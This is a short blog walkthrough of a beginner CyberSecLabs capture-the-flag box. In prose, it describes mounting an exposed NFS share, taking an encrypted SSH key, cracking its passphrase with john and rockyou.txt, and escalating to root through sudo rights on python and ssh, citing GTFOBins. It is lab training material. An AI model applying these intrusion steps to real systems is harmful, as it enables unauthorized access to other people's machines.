As the first box I’m doing from the great guys over at CyberSecLabs (https://www.cyberseclabs.co.uk/), let’s fire it up and get to work!
After adding the alias shares.csl to my /etc/hosts file, I kicked off AutoRecon and took a close look at the results. Here we see port 21 (FTP), port 80 (HTTP), port 111 (RPC), port 2049 (NFS), and port 27853 (Running SSH!), as well as some higher level ports. This high SSH port seemed odd to me.
Looking into the easy ports here, with NFS (Network File Sharing), we take a look at the nmap scan that was run on Port 111, and we see the following mount:
We mount this drive and see what we’ve got:
Thinking back to the high-port number running SSH, I bet that .ssh directory may be interesting!
Unfortunately, when you try using the private SSH key to login, and if you paid attention above, you’ll be denied access, asking for a passphrase, as the key is …. ENCRYPTED! But have no fear, ssh2john is here!
Once you have it prepped for john, run john with the rockyou.txt wordlist to find the passphrase for the original key!
Now that we have the passphrase, don’t forget to chmod 600 the original private key and let’s login. Once logged in, run sudo -l, and we see there’s a user named amy that we can run /usr/bin/pkexec or /usr/bin/python3 as.
It’s trivial at this point to get on as amy. Simply search GTFOBins for the python binary, and take a look at sudo privileges, https://gtfobins.github.io/gtfobins/python/. Switching users to amy and running python is a breeze.
Now, as amy, don’t forget to get the access.txt flag, and let’s sudo -l again! Now you see that we can run /usr/bin/ssh as anyone we want with no password, including root!
A quick trip back to GTFOBins shows us the way. Just look under sudo for ssh: https://gtfobins.github.io/gtfobins/ssh/
Thanks for tuning in to the first box I’ve gone after in the Beginner section of CyberSecLabs! I’m truly enjoying the quality of the content they’re providing here so far, and stay tuned for more!